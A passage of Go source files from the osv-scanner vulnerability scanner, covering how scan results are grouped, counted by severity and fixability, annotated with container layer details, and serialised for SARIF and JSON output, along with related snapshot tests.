represents the vulnerability scanning results for output report. type Result struct { Ecosystems []EcosystemResult // Container scanning related IsContainerScanning bool ImageInfo ImageInfo LicenseSummary LicenseSummary VulnTypeSummary VulnTypeSummary PackageTypeCount AnalysisCount VulnCount VulnCount PkgDeprecatedCount int `json:",omitempty"` } // EcosystemResult represents the vulnerability scanning results for an ecosystem. type EcosystemResult struct { Name string Sources []SourceResult IsOS bool } // SourceResult represents the vulnerability scanning results for a source file. type SourceResult struct { Name string Type models.SourceType PackageTypeCount AnalysisCount Packages []PackageResult VulnCount VulnCount LicenseViolationsCount int PkgDeprecatedCount int `json:",omitempty"` } // PackageResult represents the vulnerability scanning results for a package. type PackageResult struct { Name string // OSPackageNames represents the actual installed binary names. This is primarily used for container scanning. OSPackageNames []string InstalledVersion string Commit string FixedVersion string // RegularVulns holds all the vulnerabilities that should be displayed to users RegularVulns []VulnResult // HiddenVulns holds all the vulnerabilities that should not be displayed to users, such as those deemed unimportant or uncalled. HiddenVulns []VulnResult LayerDetail PackageContainerInfo VulnCount VulnCount Licenses []models.License LicenseViolations []models.License DepGroups []string `json:"-"` Deprecated bool `json:",omitempty"` } // VulnResult represents a single vulnerability. type VulnResult struct { ID string GroupIDs []string Aliases []string // Description is either the Vulnerability.Summary (default) or the Vulnerability.Details. Description string IsFixable bool FixedVersion string VulnAnalysisType VulnAnalysisType SeverityRating severity.Rating SeverityScore string } type ImageInfo struct { OS string AllLayers []LayerInfo AllBaseImages []BaseImageGroupInfo } type LicenseSummary struct { Summary bool ShowViolations bool LicenseCount []models.LicenseCount } // PackageContainerInfo represents detailed layer tracing information about a package. type PackageContainerInfo struct { LayerIndex int LayerInfo LayerInfo BaseImageInfo BaseImageGroupInfo } type BaseImageGroupInfo struct { Index int BaseImageInfo []models.BaseImageDetails AllLayers []LayerInfo Count VulnCount } type LayerInfo struct { Index int LayerMetadata models.LayerMetadata Count VulnCount } // VulnTypeSummary represents the count of each vulnerability type at the top level // of the scanning results. type VulnTypeSummary struct { All int OS int Project int Hidden int } // VulnCount represents the counts of vulnerabilities by call analysis, severity and fixed/unfixed status type VulnCount struct { AnalysisCount AnalysisCount // Only regular vulnerabilities are included in the severity and fixable counts. SeverityCount SeverityCount FixableCount FixableCount } // SeverityCount represents the counts of vulnerabilities by severity level. type SeverityCount struct { Critical int High int Medium int Low int Unknown int } // AnalysisCount represents the counts of vulnerabilities by analysis type (e.g. call analysis) type AnalysisCount struct { Regular int Hidden int } // FixableCount represents the counts of vulnerabilities by fixable status. type FixableCount struct { Fixed int UnFixed int } type VulnAnalysisType int const ( VulnTypeRegular VulnAnalysisType = iota // 0 VulnTypeUncalled // 1 VulnTypeUnimportant // 2 ) const UnfixedDescription = "No fix available" const VersionUnsupported = "N/A" // osEcosystems is a list of OS images. var osEcosystems = []string{"Debian", "Alpine", "Ubuntu"} // PrintResults prints the output to the outputWriter. // This function is for testing purposes only, to visualize the result format. func PrintResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { encoder := json.NewEncoder(outputWriter) encoder.SetIndent("", " ") result := BuildResults(vulnResult) //nolint:musttag return encoder.Encode(result) } // BuildResults constructs the output result structure from the vulnerability results. // // This function creates a hierarchical representation of the results, starting from the overall // summary and drilling down to ecosystems, sources, packages, and vulnerability details. // This structured format facilitates generating various output formats (e.g., table, HTML, etc.). func BuildResults(vulnResult *models.VulnerabilityResults) Result { var ecosystemMap = make(map[string][]SourceResult) var resultCount VulnCount pkgDeprecatedCount := 0 RowLoop: for _, packageSource := range vulnResult.Results { for _, pes := range packageSource.ExperimentalPES { if pes.MatchesAllVulns && pes.Justification == vex.ComponentNotPresent { continue RowLoop } } // Process vulnerabilities for each source sourceResults := processSource(packageSource) for ecosystem, source := range sourceResults { ecosystemMap[ecosystem] = append(ecosystemMap[ecosystem], source) resultCount.Add(source.VulnCount) pkgDeprecatedCount += source.PkgDeprecatedCount } } return buildResult(ecosystemMap, resultCount, vulnResult.ImageMetadata, vulnResult.ExperimentalAnalysisConfig.Licenses, vulnResult.LicenseSummary, pkgDeprecatedCount) } // buildResult builds the final Result object from the ecosystem map and total vulnerability count. func buildResult(ecosystemMap map[string][]SourceResult, resultCount VulnCount, imageMetadata *models.ImageMetadata, licenseConfig models.ExperimentalLicenseConfig, licenseCount []models.LicenseCount, pkgDeprecatedCount int) Result { result := Result{} var ecosystemResults []EcosystemResult var osResults []EcosystemResult for ecosystem, sources := range ecosystemMap { ecosystemResult := EcosystemResult{ Name: ecosystem, Sources: sources, } if isOSEcosystem(ecosystem) { ecosystemResult.IsOS = true osResults = append(osResults, ecosystemResult) } else { ecosystemResults = append(ecosystemResults, ecosystemResult) } } // Sort ecosystemResults to ensure consistent output slices.SortFunc(ecosystemResults, func(a, b EcosystemResult) int { return cmp.Compare(a.Name, b.Name) }) // Sort osResults to ensure consistent output slices.SortFunc(osResults, func(a, b EcosystemResult) int { return cmp.Compare(a.Name, b.Name) }) // Add project results before OS results ecosystemResults = append(ecosystemResults, osResults...) vulnTypeSummary := getVulnTypeSummary(ecosystemResults) packageTypeCount := getPackageTypeCount(ecosystemResults) result.Ecosystems = ecosystemResults result.VulnTypeSummary = vulnTypeSummary result.PackageTypeCount = packageTypeCount result.VulnCount = resultCount result.PkgDeprecatedCount = pkgDeprecatedCount if imageMetadata != nil { populateResultWithImageMetadata(&result, *imageMetadata) } if licenseConfig.Summary { result.LicenseSummary = LicenseSummary{ Summary: true, LicenseCount: licenseCount, } } if len(licenseConfig.Allowlist) != 0 { result.LicenseSummary.ShowViolations = true } return result } // populateResultWithImageMetadata modifies the result by adding image metadata to it. // It uses a pointer receiver (*Result) to modify the original result in place. func populateResultWithImageMetadata(result *Result, imageMetadata models.ImageMetadata) { allLayers := buildLayers(imageMetadata.LayerMetadata) allBaseImages := buildBaseImages(imageMetadata.BaseImages) layerCount := make([]VulnCount, len(allLayers)) baseImageCount := make([]VulnCount, len(allBaseImages)) // Calculate total vulns for each layer and base image. for _, ecosystem := range result.Ecosystems { for _, source := range ecosystem.Sources { for _, pkg := range source.Packages { layerIndex := pkg.LayerDetail.LayerIndex layerCount[layerIndex].Add(pkg.VulnCount) baseImageIndex := allLayers[layerIndex].LayerMetadata.BaseImageIndex baseImageCount[baseImageIndex].Add(pkg.VulnCount) } } } baseImageMap := make(map[int][]LayerInfo) // Update vuln count for layers and base images for i := range allLayers { allLayers[i].Count = layerCount[i] baseImageIndex := allLayers[i].LayerMetadata.BaseImageIndex baseImageMap[baseImageIndex] = append(baseImageMap[baseImageIndex], allLayers[i]) } for i := range allBaseImages { allBaseImages[i].Count = baseImageCount[i] slices.SortFunc(baseImageMap[i], func(a, b LayerInfo) int { return cmp.Compare(a.Index, b.Index) }) allBaseImages[i].AllLayers = baseImageMap[i] } // Fill up Layer info for each package for i := range result.Ecosystems { for j := range result.Ecosystems[i].Sources { for k := range result.Ecosystems[i].Sources[j].Packages { // Pointer to packageInfo to modify directly. packageInfo := &result.Ecosystems[i].Sources[j].Packages[k] layerIndex := packageInfo.LayerDetail.LayerIndex packageInfo.LayerDetail.LayerInfo = allLayers[layerIndex] baseImageIndex := allLayers[layerIndex].LayerMetadata.BaseImageIndex packageInfo.LayerDetail.BaseImageInfo = allBaseImages[baseImageIndex] } } } // Display base images in a reverse order slices.SortFunc(allBaseImages, func(a, b BaseImageGroupInfo) int { return cmp.Compare(b.Index, a.Index) }) result.ImageInfo = ImageInfo{ OS: imageMetadata.OS, AllLayers: allLayers, AllBaseImages: allBaseImages, } if len(allLayers) != 0 { result.IsContainerScanning = true } } func buildBaseImages(baseImages [][]models.BaseImageDetails) []BaseImageGroupInfo { allBaseImages := make([]BaseImageGroupInfo, len(baseImages)) for i, baseImage := range baseImages { allBaseImages[i] = BaseImageGroupInfo{ Index: i, BaseImageInfo: baseImage, } } return allBaseImages } func buildLayers(layerMetadata []models.LayerMetadata) []LayerInfo { allLayers := make([]LayerInfo, len(layerMetadata)) for i, layer := range layerMetadata { allLayers[i] = LayerInfo{ Index: i, LayerMetadata: layer, } } return allLayers } // processSource processes a single source (lockfile or artifact) and returns a map of ecosystems to their corresponding SourceResults. func processSource(packageSource models.PackageSource) map[string]SourceResult { // Handle potential duplicate source packages with different OS package names. // This map ensures each package is processed only once, // with subsequent occurrences only adding their OSPackageName to the list. packageMap := make(map[string]PackageResult) // Use a map to handle one source contains packages form multiple ecosystems sourceResults := make(map[string]SourceResult) // If no packages with issues are found, mark the ecosystem as empty. if len(packageSource.Packages) == 0 { sourceResults[""] = SourceResult{ Name: packageSource.Source.String(), Type: packageSource.Source.Type, Packages: []PackageResult{}, } return sourceResults } for _, vulnPkg := range packageSource.Packages { if _, exists := sourceResults[vulnPkg.Package.Ecosystem]; !exists { sourceResults[vulnPkg.Package.Ecosystem] = SourceResult{ Name: packageSource.Source.String(), Type: packageSource.Source.Type, } } // Use a unique identifier (package name + version) to deduplicate packages (same version), // ensuring each is processed only once. key := vulnPkg.Package.Ecosystem + ":" + vulnPkg.Package.Name + ":" + vulnPkg.Package.Version if _, exist := packageMap[key]; exist { pkgTemp := packageMap[key] pkgTemp.OSPackageNames = append(pkgTemp.OSPackageNames, vulnPkg.Package.OSPackageName) packageMap[key] = pkgTemp continue // Skip processing this vulnPkg as it was already added } packageResult := processPackage(vulnPkg) if vulnPkg.Package.ImageOrigin != nil { packageResult.LayerDetail = PackageContainerInfo{ LayerIndex: vulnPkg.Package.ImageOrigin.Index, } } packageMap[key] = packageResult } for ecosystem, sourceResult := range sourceResults { var packages []PackageResult for key, pkg := range packageMap { if !strings.HasPrefix(key, ecosystem) { continue } packages = append(packages, pkg) sourceResult.VulnCount.Add(pkg.VulnCount) sourceResult.LicenseViolationsCount += len(pkg.LicenseViolations) if len(pkg.RegularVulns) != 0 { sourceResult.PackageTypeCount.Regular += 1 } // A package can be counted as both regular and hidden if it has both called and uncalled vulnerabilities. if len(pkg.HiddenVulns) != 0 { sourceResult.PackageTypeCount.Hidden += 1 } if pkg.Deprecated { sourceResult.PkgDeprecatedCount += 1 } } // Sort packageResults to ensure consistent output slices.SortFunc(packages, func(a, b PackageResult) int { return cmp.Or( cmp.Compare(a.Name, b.Name), cmp.Compare(a.InstalledVersion, b.InstalledVersion), cmp.Compare(a.Commit, b.Commit), ) }) sourceResult.Packages = packages sourceResults[ecosystem] = sourceResult } return sourceResults } // processPackage processes vulnerability information for a given package // and generates a structured output result. // // This function processes the vulnerability groups, updates vulnerability details, // and constructs the final output result for the package, including details about // called and uncalled vulnerabilities, fixable counts, and layer information (if available). func processPackage(vulnPkg models.PackageVulns) PackageResult { regularVulnMap, hiddenVulnMap := processVulnGroups(vulnPkg) updateVuln(regularVulnMap, vulnPkg) updateVuln(hiddenVulnMap, vulnPkg) regularVulnList := getVulnList(regularVulnMap) hiddenVulnList := getVulnList(hiddenVulnMap) count := calculateCount(regularVulnList, hiddenVulnList) packageFixedVersion := calculatePackageFixedVersion(vulnPkg.Package.Ecosystem, regularVulnList) packageResult := PackageResult{ Name: vulnPkg.Package.Name, OSPackageNames: []string{vulnPkg.Package.OSPackageName}, InstalledVersion: vulnPkg.Package.Version, Commit: vulnPkg.Package.Commit, FixedVersion: packageFixedVersion, RegularVulns: regularVulnList, HiddenVulns: hiddenVulnList, VulnCount: count, Licenses: vulnPkg.Licenses, LicenseViolations: vulnPkg.LicenseViolations, DepGroups: vulnPkg.DepGroups, Deprecated: vulnPkg.Package.Deprecated, } return packageResult } // processVulnGroups processes vulnerability groups within a package. // // Returns: // // regularVulnMap: A map of regular vulnerabilities, keyed by their representative ID. // hiddenVulnMap: A map of unimportant vulnerabilities, keyed by their representative ID. func processVulnGroups(vulnPkg models.PackageVulns) (map[string]VulnResult, map[string]VulnResult) { regularVulnMap := make(map[string]VulnResult) hiddenVulnMap := make(map[string]VulnResult) for _, group := range vulnPkg.Groups { representID := group.IDs[0] var aliases []string if len(group.Aliases) > 0 && slices.Contains(group.Aliases, representID) { for _, val := range group.Aliases { if val != representID { aliases = append(aliases, val) } } } vuln := VulnResult{ ID: representID, GroupIDs: group.IDs, Aliases: aliases, } vuln.SeverityScore = group.MaxSeverity vuln.SeverityRating, _ = severity.CalculateRating(vuln.SeverityScore) if vuln.SeverityRating == severity.UnknownRating { vuln.SeverityScore = "N/A" } if group.IsCalled() && !group.IsGroupUnimportant() { vuln.VulnAnalysisType = VulnTypeRegular regularVulnMap[representID] = vuln } else if group.IsGroupUnimportant() { vuln.VulnAnalysisType = VulnTypeUnimportant hiddenVulnMap[representID] = vuln } else if !group.IsCalled() { vuln.VulnAnalysisType = VulnTypeUncalled hiddenVulnMap[representID] = vuln } } return regularVulnMap, hiddenVulnMap } // updateVuln updates each vulnerability info in vulnMap from the details of vulnPkg.Vulnerabilities. func updateVuln(vulnMap map[string]VulnResult, vulnPkg models.PackageVulns) { for _, vuln := range vulnPkg.Vulnerabilities { fixable, fixedVersion := getNextFixVersion(vuln.GetAffected(), vulnPkg.Package.Version, vulnPkg.Package.Name, vulnPkg.Package.Ecosystem) if outputVuln, exist := vulnMap[vuln.GetId()]; exist { outputVuln.FixedVersion = fixedVersion outputVuln.IsFixable = fixable outputVuln.Description = vuln.GetSummary() if outputVuln.Description == "" { outputVuln.Description = vuln.GetDetails() } vulnMap[vuln.GetId()] = outputVuln } } } func getVulnList(vulnMap map[string]VulnResult) []VulnResult { vulnList := make([]VulnResult, 0, len(vulnMap)) for _, vuln := range vulnMap { vulnList = append(vulnList, vuln) } // Sort projectResults to ensure consistent output slices.SortFunc(vulnList, func(a, b VulnResult) int { return identifiers.IDSortFunc(a.ID, b.ID) }) return vulnList } // getNextFixVersion finds the next fixed version for a given vulnerability. // returns a boolean value indicating whether a fixed version is available. func getNextFixVersion(allAffected []*osvschema.Affected, installedVersion string, installedPackage string, ecosystem string) (bool, string) { ecosystemPrefix := strings.Split(ecosystem, ":")[0] vp, err := semantic.Parse(installedVersion, ecosystemPrefix) if err != nil { return false, VersionUnsupported } minFixVersion := UnfixedDescription for _, affected := range allAffected { if affected.GetPackage().GetName() != installedPackage || removeVariants(affected.GetPackage().GetEcosystem()) != ecosystem { continue } for _, affectedRange := range affected.GetRanges() { for _, affectedEvent := range affectedRange.GetEvents() { order, _ := vp.CompareStr(affectedEvent.GetFixed()) // Skip if it's not a fix version event or the installed version is greater than the fix version. if affectedEvent.GetFixed() == "" || order > 0 { continue } order, _ = semantic.MustParse(affectedEvent.GetFixed(), ecosystemPrefix).CompareStr(minFixVersion) // Find the minimum fix version if minFixVersion == UnfixedDescription || order < 0 { minFixVersion = affectedEvent.GetFixed() } } } } hasFixedVersion := minFixVersion != UnfixedDescription // Check if a fix is found return hasFixedVersion, minFixVersion } // calculatePackageFixedVersion determines the highest version that resolves the most known vulnerabilities for a package. func calculatePackageFixedVersion(ecosystem string, allVulns []VulnResult) string { ecosystemPrefix := strings.Split(ecosystem, ":")[0] maxFixVersion := "" var vp semantic.Version for _, vuln := range allVulns { // Skip vulnerabilities without a fixed version. if !vuln.IsFixable { continue } if maxFixVersion == "" { maxFixVersion = vuln.FixedVersion // maxFixVersion will always be valid as it comes from a parsable vulnerability fixed version. // If the fixed version was invalid, 'IsFixable' will be marked as false and will be skipped. vp = semantic.MustParse(maxFixVersion, ecosystemPrefix) continue } order, _ := vp.CompareStr(vuln.FixedVersion) // Update if the current vulnerability's fixed version is higher if order < 0 { maxFixVersion = vuln.FixedVersion vp = semantic.MustParse(maxFixVersion, ecosystemPrefix) } } // Default to UnfixedDescription if no fix version is found. if maxFixVersion == "" { maxFixVersion = UnfixedDescription } return maxFixVersion } // Add adds the counts from another VulnCount to the receiver. func (v *VulnCount) Add(other VulnCount) { v.SeverityCount.Add(other.SeverityCount) v.AnalysisCount.Add(other.AnalysisCount) v.FixableCount.Add(other.FixableCount) } // Add adds the counts from another SeverityCount to the receiver. func (c *SeverityCount) Add(other SeverityCount) { c.Critical += other.Critical c.High += other.High c.Medium += other.Medium c.Low += other.Low c.Unknown += other.Unknown } // Add adds the counts from another CallAnalysisCount to the receiver. func (c *AnalysisCount) Add(other AnalysisCount) { c.Regular += other.Regular c.Hidden += other.Hidden } // Add adds the counts from another FixableCount to the receiver. func (c *FixableCount) Add(other FixableCount) { c.Fixed += other.Fixed c.UnFixed += other.UnFixed } func (vt VulnAnalysisType) String() string { switch vt { case VulnTypeRegular: return "Regular" case VulnTypeUncalled: return "Uncalled" case VulnTypeUnimportant: return "Unimportant" default: return "Unknown" } } func getFilteredVulnReasons(vulns []VulnResult) string { reasonMap := make(map[string]bool) for _, vuln := range vulns { if vuln.VulnAnalysisType != VulnTypeRegular { reasonMap[vuln.VulnAnalysisType.String()] = true } } reasons := make([]string, 0, len(reasonMap)) for reason := range reasonMap { reasons = append(reasons, reason) } sort.Strings(reasons) return strings.Join(reasons, ", ") } func getBaseImageName(baseImageInfo BaseImageGroupInfo) string { if len(baseImageInfo.BaseImageInfo) > 0 { return baseImageInfo.BaseImageInfo[0].Name } return "" } func increaseSeverityCount(severityCount SeverityCount, severityType severity.Rating) SeverityCount { switch severityType { case severity.CriticalRating: severityCount.Critical += 1 case severity.HighRating: severityCount.High += 1 case severity.MediumRating: severityCount.Medium += 1 case severity.LowRating: severityCount.Low += 1 case severity.UnknownRating: severityCount.Unknown += 1 } return severityCount } func isOSEcosystem(ecosystem string) bool { for _, image := range osEcosystems { if strings.HasPrefix(ecosystem, image) { return true } } return false } func getVulnTypeSummary(result []EcosystemResult) VulnTypeSummary { var vulnTypeSummary VulnTypeSummary for _, ecosystem := range result { for _, source := range ecosystem.Sources { if ecosystem.IsOS { vulnTypeSummary.OS += source.VulnCount.AnalysisCount.Regular } else { vulnTypeSummary.Project += source.VulnCount.AnalysisCount.Regular } vulnTypeSummary.Hidden += source.VulnCount.AnalysisCount.Hidden } } vulnTypeSummary.All = vulnTypeSummary.OS + vulnTypeSummary.Project return vulnTypeSummary } func getPackageTypeCount(result []EcosystemResult) AnalysisCount { var packageCount AnalysisCount for _, ecosystem := range result { for _, source := range ecosystem.Sources { packageCount.Regular += source.PackageTypeCount.Regular packageCount.Hidden += source.PackageTypeCount.Hidden } } return packageCount } // calculateCount calculates the vulnerability counts based on the provided // lists of regular and hidden vulnerabilities. func calculateCount(regularVulnList, hiddenVulnList []VulnResult) VulnCount { var count VulnCount for _, vuln := range regularVulnList { if vuln.IsFixable { count.FixableCount.Fixed += 1 } else { count.FixableCount.UnFixed += 1 } count.SeverityCount = increaseSeverityCount(count.SeverityCount, vuln.SeverityRating) } count.AnalysisCount.Regular = len(regularVulnList) count.AnalysisCount.Hidden = len(hiddenVulnList) return count } // formatLayerCommand formats the layer command output for better readability. // It replaces the unreadable file ID with "UNKNOWN" and extracting the ID separately. func formatLayerCommand(command string) []string { command = cleanupSpaces(command) re := cachedregexp.MustCompile(`(dir|file):([a-f0-9]+)`) match := re.FindStringSubmatch(command) if len(match) > 2 { prefix := match[1] // Capture "dir" or "file" hash := match[2] // Capture the hash ID newCommand := re.ReplaceAllString(command, prefix+":UNKNOWN") return []string{newCommand, "File ID: " + hash} } return []string{command, ""} } // cleanupSpaces uses a regular expression to replace multiple spaces with a single space. func cleanupSpaces(s string) string { re := cachedregexp.MustCompile(`\s+`) s = re.ReplaceAllString(s, " ") s = strings.TrimSpace(s) return s } func printSummary(result Result, out io.Writer) { packageForm := Form(result.PackageTypeCount.Regular, "package", "packages") vulnerabilityForm := Form(result.VulnTypeSummary.All, "vulnerability", "vulnerabilities") fixedVulnForm := Form(result.VulnCount.FixableCount.Fixed, "vulnerability", "vulnerabilities") ecosystemForm := Form(len(result.Ecosystems), "ecosystem", "ecosystems") summary := fmt.Sprintf( "Total %[1]d %[10]s affected by %[2]d known %[11]s (%[3]s, %[4]s, %[5]s, %[6]s, %[7]s) from %[8]s.\n"+ "%[9]d %[12]s can be fixed.\n", result.PackageTypeCount.Regular, result.VulnTypeSummary.All, text.FgRed.Sprintf("%d Critical", result.VulnCount.SeverityCount.Critical), text.FgHiYellow.Sprintf("%d High", result.VulnCount.SeverityCount.High), text.FgYellow.Sprintf("%d Medium", result.VulnCount.SeverityCount.Medium), text.FgHiCyan.Sprintf("%d Low", result.VulnCount.SeverityCount.Low), text.FgCyan.Sprintf("%d Unknown", result.VulnCount.SeverityCount.Unknown), text.FgGreen.Sprintf("%d %s", len(result.Ecosystems), ecosystemForm), result.VulnCount.FixableCount.Fixed, packageForm, vulnerabilityForm, fixedVulnForm, ) fmt.Fprintln(out, summary) } func printPkgDeprecatedSummary(result Result, out io.Writer) { packageForm := Form(result.PkgDeprecatedCount, "package", "packages") summary := fmt.Sprintf("Total %d %s deprecated.\n", result.PkgDeprecatedCount, packageForm) fmt.Fprintln(out, summary) } func getInstalledVersionOrCommit(pkg PackageResult) string { result := pkg.InstalledVersion if result == "" && pkg.Commit != "" { result = results.GetShortCommit(pkg.Commit) } return result } func isOSResult(sourceType models.SourceType) bool { return sourceType == models.SourceTypeOSPackage } func containsOSResult(result Result) bool { for _, ecosystem := range result.Ecosystems { for _, source := range ecosystem.Sources { if isOSResult(source.Type) { return true } } } return false } func ecosystemHasRegVuln(ecosystem EcosystemResult) bool { for _, source := range ecosystem.Sources { if source.PackageTypeCount.Regular > 0 { return true } } return false } func removeVariants(ecosystem string) string { if strings.Contains(ecosystem, "Ubuntu") { ecosystem := strings.ReplaceAll(strings.ReplaceAll(ecosystem, ":Pro", ""), ":LTS", "") return ecosystem } return ecosystem } func formatHiddenVulnsPrompt(hiddenVulns int) string { return fmt.Sprintf("Hiding %d number of vulnerabilities deemed unimportant, use --all-vulns to show them.", hiddenVulns) } func GetContainerScanningHeader(result Result) string { if !result.IsContainerScanning { return "" } header := fmt.Sprintf("Container Scanning Result (%s)", result.ImageInfo.OS) var baseImageName string for _, baseImage := range result.ImageInfo.AllBaseImages { if baseImage.Index == 1 { baseImageName = getBaseImageName(baseImage) break } } if baseImageName != "" { header += fmt.Sprintf(" (Based on \"%s\" image)", baseImageName) } return header } ================================================ FILE: internal/output/output_result_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestPrintOutputResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/result.go ================================================ package output import ( "encoding/json" "fmt" "log" "maps" "os" "slices" "strings" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) type pkgWithSource struct { Package models.PackageInfo `json:"Package"` Source models.SourceInfo `json:"Source"` } // Custom implementation of this unique set map to allow it to serialize to JSON type pkgSourceSet map[pkgWithSource]struct{} // StableKeys returns the pkgWithSource keys in a deterministic order func (pss *pkgSourceSet) StableKeys() []pkgWithSource { pkgWithSrcKeys := slices.AppendSeq(make([]pkgWithSource, 0, len(*pss)), maps.Keys(*pss)) slices.SortFunc(pkgWithSrcKeys, func(a, b pkgWithSource) int { // compare based on each field in descending priority for _, fn := range []func() int{ func() int { return strings.Compare(a.Source.Path, b.Source.Path) }, func() int { return strings.Compare(a.Package.Name, b.Package.Name) }, func() int { return strings.Compare(a.Package.Version, b.Package.Version) }, } { if r := fn(); r != 0 { return r } } return 0 }) return pkgWithSrcKeys } func (pss *pkgSourceSet) MarshalJSON() ([]byte, error) { res := make([]pkgWithSource, 0, len(*pss)) for v := range *pss { res = append(res, v) } return json.Marshal(res) } func (pss *pkgSourceSet) UnmarshalJSON(data []byte) error { aux := []pkgWithSource{} if err := json.Unmarshal(data, &aux); err != nil { return err } *pss = make(pkgSourceSet) for _, pws := range aux { (*pss)[pws] = struct{}{} } return nil } // mustGetWorkingDirectory panics if it can't get the working directory func mustGetWorkingDirectory() string { dir, err := os.Getwd() if err != nil { log.Panicf("can't get working dir: %v", err) } return dir } // groupFixedVersions builds the fixed versions for each ID Group, with keys formatted like so: // `Source:ID` func groupFixedVersions(flattened []models.VulnerabilityFlattened) map[string][]string { groupedFixedVersions := map[string][]string{} // Get the fixed versions indexed by each group of vulnerabilities // Prepend source path as same vulnerability in two projects should be counted twice // Remember to sort and compact before displaying later for _, vf := range flattened { if vf.Vulnerability == nil { continue } groupIdx := vf.Source.String() + ":" + vf.GroupInfo.IndexString() pkg := vulns.PackageKey{ Ecosystem: vf.Package.Ecosystem, Name: vf.Package.Name, } groupedFixedVersions[groupIdx] = append(groupedFixedVersions[groupIdx], vulns.GetFixedVersions(vf.Vulnerability)[pkg]...) } // Remove duplicates for k := range groupedFixedVersions { fixedVersions := groupedFixedVersions[k] slices.Sort(fixedVersions) groupedFixedVersions[k] = slices.Compact(fixedVersions) } return groupedFixedVersions } // groupedSARIFFinding groups vulnerabilities by aliases type groupedSARIFFinding struct { DisplayID string PkgSource pkgSourceSet // AliasedVulns contains vulns that are OSV vulnerabilities AliasedVulns map[string]*osvschema.Vulnerability // AliasedIDList contains all aliased IDs, including ones that are not OSV (e.g. CVE IDs) // Sorted by idSortFunc, therefore the first element will be the display ID AliasedIDList []string } // UnmarshalJSON implements the json.unmarshaler interface. // It is required because the AliasedVulns field is a proto message, // which requires protojson to unmarshal, while the rest of the struct uses // the standard encoding/json library. func (g *groupedSARIFFinding) UnmarshalJSON(data []byte) error { // Use alias to avoid recursion. type alias groupedSARIFFinding // Use temporary struct to combine standard fields (via alias) // and the manually processed field (via shadowing). tmp := &struct { *alias AliasedVulns map[string]json.RawMessage `json:"AliasedVulns"` }{ alias: (*alias)(g), } if err := json.Unmarshal(data, &tmp); err != nil { return err } // Manually process the custom field from RawMessage format. if tmp.AliasedVulns != nil { g.AliasedVulns = make(map[string]*osvschema.Vulnerability, len(tmp.AliasedVulns)) for id, rawVuln := range tmp.AliasedVulns { var vuln osvschema.Vulnerability if err := protojson.Unmarshal(rawVuln, &vuln); err != nil { return fmt.Errorf("failed to protojson unmarshal vuln %q: %w", id, err) } g.AliasedVulns[id] = &vuln } } return nil } // MarshalJSON implements the json.Marshaler interface. // It is required because the AliasedVulns field is a proto message, // which requires protojson to marshal, while the rest of the struct uses // the standard encoding/json library. func (g *groupedSARIFFinding) MarshalJSON() ([]byte, error) { // Use alias to avoid recursion. type alias groupedSARIFFinding // Pre-process the custom field into standardized RawMessage format. var rawVulns map[string]json.RawMessage if g.AliasedVulns != nil { rawVulns = make(map[string]json.RawMessage, len(g.AliasedVulns)) for id, vuln := range g.AliasedVulns { unstableJSON, err := protojson.Marshal(vuln) if err != nil { return nil, fmt.Errorf("failed to marshal vuln %q: %w", id, err) } var vuln any if err := json.Unmarshal(unstableJSON, &vuln); err != nil { return nil, err } b, err := json.MarshalIndent(vuln, "", " ") if err != nil { return nil, err } rawVulns[id] = b } } // Use temporary struct to combine standard fields (via alias) // and the manually processed field (via shadowing). return json.Marshal(&struct { *alias AliasedVulns map[string]json.RawMessage `json:"AliasedVulns"` }{ alias: (*alias)(g), AliasedVulns: rawVulns, }) } // mapIDsToGroupedSARIFFinding creates a map over all vulnerability IDs, with aliased vuln IDs // pointing to the same groupedSARIFFinding object func mapIDsToGroupedSARIFFinding(vulnResults *models.VulnerabilityResults) map[string]*groupedSARIFFinding { // Map of vuln IDs to their respective groupedSARIFFinding results := map[string]*groupedSARIFFinding{} for _, res := range vulnResults.Results { for _, pkg := range res.Packages { for _, gi := range pkg.Groups { var data *groupedSARIFFinding // See if this vulnerability group already exists (from another package or source) for _, id := range gi.IDs { existingData, ok := results[id] if ok { data = existingData break } } // If not create this group if data == nil { data = &groupedSARIFFinding{ PkgSource: make(pkgSourceSet), AliasedVulns: make(map[string]*osvschema.Vulnerability), } } // Point all the IDs of the same group to the same data, either newly created or existing for _, id := range gi.IDs { results[id] = data } } for _, v := range pkg.Vulnerabilities { newPkgSource := pkgWithSource{ Package: pkg.Package, Source: res.Source, } entry := results[v.GetId()] entry.PkgSource[newPkgSource] = struct{}{} entry.AliasedVulns[v.GetId()] = v entry.AliasedIDList = append(entry.AliasedIDList, v.GetId()) entry.AliasedIDList = append(entry.AliasedIDList, v.GetAliases()...) } } } for _, gs := range results { slices.SortFunc(gs.AliasedIDList, identifiers.IDSortFunc) gs.AliasedIDList = slices.Compact(gs.AliasedIDList) gs.DisplayID = gs.AliasedIDList[0] } return results } ================================================ FILE: internal/output/result_test.go ================================================ package output import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func Test_groupFixedVersions(t *testing.T) { t.Parallel() tests := []struct { name string args []models.VulnerabilityFlattened want testutility.Snapshot }{ { name: "", args: testutility.LoadJSONFixture[[]models.VulnerabilityFlattened](t, "testdata/flattened_vulns.json"), want: testutility.NewSnapshot(), }, { name: "", args: testutility.LoadJSONFixtureWithWindowsReplacements[[]models.VulnerabilityFlattened](t, "testdata/flattened_vulns.json", map[string]string{ "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\sub-rust-project\\\\Cargo.lock", "/path/to/scorecard-check-osv-e2e/go.mod": "D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\go.mod", }, ), want: testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ "D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\sub-rust-project\\\\Cargo.lock": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock", 